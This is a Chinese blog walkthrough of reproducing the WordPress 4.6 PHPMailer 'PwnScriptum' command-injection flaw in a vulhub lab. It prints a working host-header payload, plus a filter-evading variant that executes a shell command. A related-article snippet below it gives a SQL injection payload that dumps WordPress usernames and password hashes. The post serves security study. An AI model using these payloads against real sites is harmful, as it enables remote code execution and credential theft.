【vulhub】WordPress pwnscriptum漏洞复现

最新推荐文章于 2024-04-29 00:03:14 发布
最新推荐文章于 2024-04-29 00:03:14 发布
阅读量219 收藏
点赞数
文章标签: docker 安全威胁分析 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58873970/article/details/132679745
版权

漏洞简介

phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload

影响版本

WordPress <= 4.6.0
PHPMailer < 5.2.18

复现环境

靶机kali: 192.168.23.134
kali作为靶机的同时也作为攻击机
具体操作不再详细赘述,启动vulhub,然后kali开启浏览器,详细抓包操作可参考简单了解cms,复现vulhub中的wordpress漏洞

漏洞复现

打开安装
在这里插入图片描述忘记密码
在这里插入图片描述开启浏览器抓包,后进行发送到burpsuite
在这里插入图片描述
抓到包之后发送到repeater重发器
在这里插入图片描述payload:

aa(any -froot@localhost -be ${run{/bin/touch /tmp/success}} null)
# 大家可以自行替换执行代码这里不进行赘赘述(请大家在执行测试前谨慎执行)
#意思是在tmp处创建success文件

但是由于WordPress以及PHPMailer都会防止攻击者注入空字符,并且host字段值中出现’/'会出现请求错误,所以我们要绕过空格和/
payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替
payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

最终payload为:aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

替换host请求字段
在这里插入图片描述send发送请求
验证:通过docker容器进入环境查看
输入docker ps -a,获取环境id
输入命令:docker exec it your_id /bin/bash进入容器命令环境
输入ls /tmp查看是否写入成功
在这里插入图片描述此时,可以看到文件写入成功,漏洞复现成功

翻斗花园程序员
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wordpress pwnscriptum复现(超详细呀)
2301_76467680的博客
06-29 162
然后点击外观点击编辑点击404模板。
Wordpress漏洞复现
weixin_52194536的博客
09-10 8884
cms漏洞
pwnscriptum漏洞复现
m0_74402888的博客
04-29 597
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。然后点击外观点击编辑点击404模板。这个目录文件是公开的。
Vulhub靶场WordPress4.6命令执行(PwnScriptum漏洞复现
X_python321的博客
07-11 629
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2682
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
WordPress4.6命令执行漏洞(CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3437
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行的
漏洞复现-wordpress RCE-CVE-2024-25600
04-12 521
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
WordPress扫描程序:WordPress漏洞扫描程序
02-05
Wordpress Scanner能够发现Wordpress安装中的缺陷,并将提供有关该漏洞的所有信息。 Wordpress Scanner不是用于代码审核的工具,它对Wordpress支持的Web应用程序执行“黑匣子”扫描。 基本安全检查将检查WordPress...
WordPress博客出现的绝对路径泄露漏洞及修复方法
09-28
主要介绍了WordPress出现的绝对路径泄露漏洞及修复方法,需要的朋友可以参考下
WordPress<= 4.6命令执行漏洞vulhub复现
weixin_45895237的博客
03-18 6309
WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)
wordpress 4.6任意命令执行漏洞PwnScriptum复现
永远是少年
12-31 1478
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞PwnScriptum复现。 一、wordpress 4.6任意命令执行漏洞PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞PwnScriptum复现
Wordpress漏洞利用&WPscan使用
Love&Share
11-17 8816
WordPress是一个开源的内容管理系统(CMS),在全球范围内使用比较广泛,但遇到一个WP站点时可以首先用WPscan进行扫描收集信息 WPscan WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞WordPress本身的漏洞,在遇到wp站点时可以扫描一下 1、刺探基础信息: wpscan --url http://www.example.com 2、猜解后台用户名 wpscan --url.
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 542
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
漏洞复现WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
做自己喜欢的事,并将其发挥到极致!
09-15 939
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上传、下载、压缩、复制和粘贴文件和文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
【网安神器篇】——WPScan漏洞扫描工具
热门推荐
Demo不是emo的博客
10-04 1万+
​这是网安神器专栏的第一篇博客,本专栏主要是为了和大家分享平时遇见的冷门但实用的网安工具或项目,希望能帮助到同学们,今天给大家带来的是wordpress渗透神器——wpscan
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1040
简单了解cms,复现vulhub中的wordpress漏洞
wordpress sql注入复现
最新发布
04-29
WordPress SQL注入漏洞是指攻击者通过构造恶意SQL语句,利用WordPress的SQL查询接口,成功地向WordPress数据库中插入或者篡改数据,甚至可以直接获取管理员权限。以下是一个简单的复现过程: 1. 在WordPress网站的搜索框中输入以下内容: ``` ' UNION SELECT null, user_login, user_pass FROM wp_users-- ``` 2. 点击搜索按钮,可以看到网站返回的SQL语句中已经将当前WordPress网站的用户名和密码列举出来了。 3. 攻击者可以利用这个漏洞,将恶意代码插入到WordPress数据库中,从而获取网站的控制权。 需要注意的是,为了复现这个漏洞,需要对WordPress进行一定的设置和环境搭建。在实际攻击中,攻击者可能会通过其他途径进行攻击。建议管理员及时更新WordPress版本并采取安全措施来防范此类漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值